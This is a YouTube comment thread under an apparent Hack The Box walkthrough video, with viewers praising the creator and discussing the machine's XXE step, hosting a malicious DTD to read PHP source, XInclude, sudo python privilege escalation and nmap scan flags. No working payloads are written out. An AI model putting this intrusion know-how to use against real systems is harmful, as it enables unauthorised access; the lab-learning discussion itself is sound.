Love your content!! Was stuck on the XXE doing it on my own, luckily for me you uploaded this tutorial. Had a lot of fun doing the command line interface on python! Keep up the insane work!
Earlier I tried this box but didn't completed it because something was unknown for me, Like I don't know how to do that, Thank you for the video and teaching everything will watch this tonight and also gonna complete the box. 🙏🌟
This was a pretty ingenious machine, not too hard but just tricky/hard enough depending on your experience. Plus it was great to practice some code analysis at the beginner/easy level
Say the form was as in this video, but instead of the XML body being generated client side, it sends the four variables you input and generates the XML serverside, is there still a way to get XXE in this scenario?? obviously in this case you couldn't add entities to the DOCTYPE, but is there any way to do it inline?
I was wondering the same thing. What he accomplished in the first 15 minutes would probably take me hours, not including time spent banging my head on the desk 😂 he's a wizard either way
It is, but while it's technically easy(scan website, find creds, use known technique, SSH over) that was also one hell of a specific piece of knowledge needed for this. I'm amazed I've never heard of XXE or PayloadsAllTheThings until now somehow, and that's with several Udemy courses and HTB machines over the last 2 years. And while that route is something that exists for other machines, this machine seemed to have the sudo -l NOPASSWD tied specifically to that python version and script(which also no one had Write access to, so you couldn't just add a line at the beginning to pop a shell), so not sure that would work. Although I do have one or two things I'm interested in trying to see if there's alternate ways to get more info or access on this. I kinda hate that XXE thing. It's good to know but just strikes me as incredibly oddly specific for some reason. Then again, so were the tickets, and sometimes that's just what's needed. But still. Argh.
What may seem easy to some people, it may be difficult for others. I think HTB likes to cover all of the different areas of difficulty for those who aren’t able to get the VIP service.
@@hadrian3689 You are right ! But this box was so traditional, never expect such quality from HTB. There are easy boxes on HTB but they have some twist..this box was like hey come, got root ? No ok here we go !
How do you'll retrieve PHP source code outside the host? I mean, when you get content from outside, the PHP script is interpreted by the webserver. I didn't understand what you meant. Would you like to explain?
@@slayeeerrr i tried it but failed :( , sorry for the comment i hosted dtd file which contains entity and pointed that entity in the xml form field but didnot get contnets sorry for this comment
Nmap only runs version detection/scripts on ports it finds open, as these are done after host discovery and port scanning. So there is no reason to run multiple nmap scans for this, using both options -p- and -A on the same scan is fine
The first Nmap execution is valid for just taking all open ports quickly! That's where comes from the `--min-rate 10000 -sS -p-`. So, you can execute whatever you want straight to each (open) port afterward. Since sS doesn't establish a TCP connection, and you need the handshake to take enumerate thoroughly, running two Nmap is faster to take everything instead of executing "nmap -A -p- --min-rate 10000,` which can screw up the network environment. Then again, using Nmap with `-p- -A` (a trivial aggressive scanning on all ports) always takes a long time to finish the scanning in contrast to "--min-rate 10000 -sS -p-". *Note: I should advise you that you don't have to worry about network performance in a CTF-like environment. *Edit/Update: I have to get rid of dashes characters.
Love your content!! Was stuck on the XXE doing it on my own, luckily for me you uploaded this tutorial. Had a lot of fun doing the command line interface on python! Keep up the insane work!
How is every step of enumeration and footprinting going so easy and smooth, but also reasonable. It's amazing.
first one , Love u from Morocco you Are a LEGEND by the way
A true "Senpai"
Thank you for all that you do.
This one surprised me because of the XXE, but it was obvious after I had found the code disclosure. Definitely had me refreshing my XML skills.
Earlier I tried this box but didn't completed it because something was unknown for me, Like I don't know how to do that, Thank you for the video and teaching everything will watch this tonight and also gonna complete the box. 🙏🌟
This was a pretty ingenious machine, not too hard but just tricky/hard enough depending on your experience. Plus it was great to practice some code analysis at the beginner/easy level
Great vid once again! Really is so easy to understand when watching you do it, and I often come away with some great tips. Thanks a lot
i like when ipp says if you're not running anything in every second you are just wasting ....
This is so insane how fast this videos goes.
Its almost like me and ippsec had the exact same approach to making a video on this box! Though he always does it better!
Say the form was as in this video, but instead of the XML body being generated client side, it sends the four variables you input and generates the XML serverside, is there still a way to get XXE in this scenario?? obviously in this case you couldn't add entities to the DOCTYPE, but is there any way to do it inline?
You could potentially use an xinclude I think, but that would require the schema being available.
sir...you are talented, thanks for sharing!
OMG! ippsec, That xxe py is awesome 🤤
Love the way you give the information. thank you
little note: this machine is a Linux machine and you put it with a windows playlist. you can fix this
Thanks fixed it
Do you run through boxes first before recording?
I was wondering the same thing. What he accomplished in the first 15 minutes would probably take me hours, not including time spent banging my head on the desk 😂 he's a wizard either way
Great video 👏🏽
this is useful, thank you sir
this machine was neat. I almost got blood on it as well, was like 20 seconds from it
Ok thanks
This is considered an easy box? 😰 Or were you just having fun because you're bored? Could you have just done a gtfobin sudo python to get priv esc?
It is, but while it's technically easy(scan website, find creds, use known technique, SSH over) that was also one hell of a specific piece of knowledge needed for this. I'm amazed I've never heard of XXE or PayloadsAllTheThings until now somehow, and that's with several Udemy courses and HTB machines over the last 2 years.
And while that route is something that exists for other machines, this machine seemed to have the sudo -l NOPASSWD tied specifically to that python version and script(which also no one had Write access to, so you couldn't just add a line at the beginning to pop a shell), so not sure that would work.
Although I do have one or two things I'm interested in trying to see if there's alternate ways to get more info or access on this. I kinda hate that XXE thing. It's good to know but just strikes me as incredibly oddly specific for some reason. Then again, so were the tickets, and sometimes that's just what's needed. But still. Argh.
Thx
Thanks so much
Hey @IppSec would you say this box is oscp level? Or is it above that? & As always GREAT CONTENT! It's amazing what you do for the community!!!
How do I stop active machine in hack the box? I cannot do anything until it is stopped? However, i cannot see any active machines.
If you have an IP spawned for a machine it will be considered active. Make sure you go back through the previous box you were doing and disconnect it
Did you used database user password to login into developer ssh account? In real world this scenario is highly impossible... :(
I think you’d be surprised how often credential reuse is a problem
39:38
when you said "and we're now root" i felt like you just hacked some nsa like server :D
Hey ippsec, do u still use obsidian for notes?
Bro iam beginniner i don't no anything about hacking .where should I start and what should I learn to start in hack the box .
Thanks for the content ippsec
Wow
4rth Comment ❤️🇵🇰
did ippsec upload the wrong box tutorial by accident?
What do you mean?
Not sure how this box gor selected on HTB these days,but great video as usual.
What's wrong with this machine?
What may seem easy to some people, it may be difficult for others. I think HTB likes to cover all of the different areas of difficulty for those who aren’t able to get the VIP service.
@@hadrian3689 You are right ! But this box was so traditional, never expect such quality from HTB. There are easy boxes on HTB but they have some twist..this box was like hey come, got root ? No ok here we go !
Thanks a lot for the Videos!!
Any chance of doing Secret Walktrough?
Peace!
When it retires he will. He doesn’t do live machines
@@hadrian3689 oh… I didn’t know that! TKS
🐶
Please Do "bolt" is kinda like hard
if php filter was blocked then we can also host our malicious dtd and in our dtd we can generate payload using CDATA to retrieve php file contents
How do you'll retrieve PHP source code outside the host? I mean, when you get content from outside, the PHP script is interpreted by the webserver.
I didn't understand what you meant. Would you like to explain?
@@slayeeerrr i tried it but failed :( , sorry for the comment
i hosted dtd file which contains entity
and pointed that entity in the xml form field
but didnot get contnets
sorry for this comment
@@Tech69YT Don't sweat it, bro! Thanks for replying!! :-)
5th Comment 🔥🎉
Nmap only runs version detection/scripts on ports it finds open, as these are done after host discovery and port scanning. So there is no reason to run multiple nmap scans for this, using both options -p- and -A on the same scan is fine
The first Nmap execution is valid for just taking all open ports quickly! That's where comes from the `--min-rate 10000 -sS -p-`. So, you can execute whatever you want straight to each (open) port afterward. Since sS doesn't establish a TCP connection, and you need the handshake to take enumerate thoroughly, running two Nmap is faster to take everything instead of executing "nmap -A -p- --min-rate 10000,` which can screw up the network environment.
Then again, using Nmap with `-p- -A` (a trivial aggressive scanning on all ports) always takes a long time to finish the scanning in contrast to "--min-rate 10000 -sS -p-".
*Note: I should advise you that you don't have to worry about network performance in a CTF-like environment.
*Edit/Update: I have to get rid of dashes characters.
Play Backdoor room pls
First. Notice me sensei!!
Xxe
I wouldn't be where I am today if it wasn't for you ipp. Amazing content creator and teacher. 11/10 would recommend.
Thanks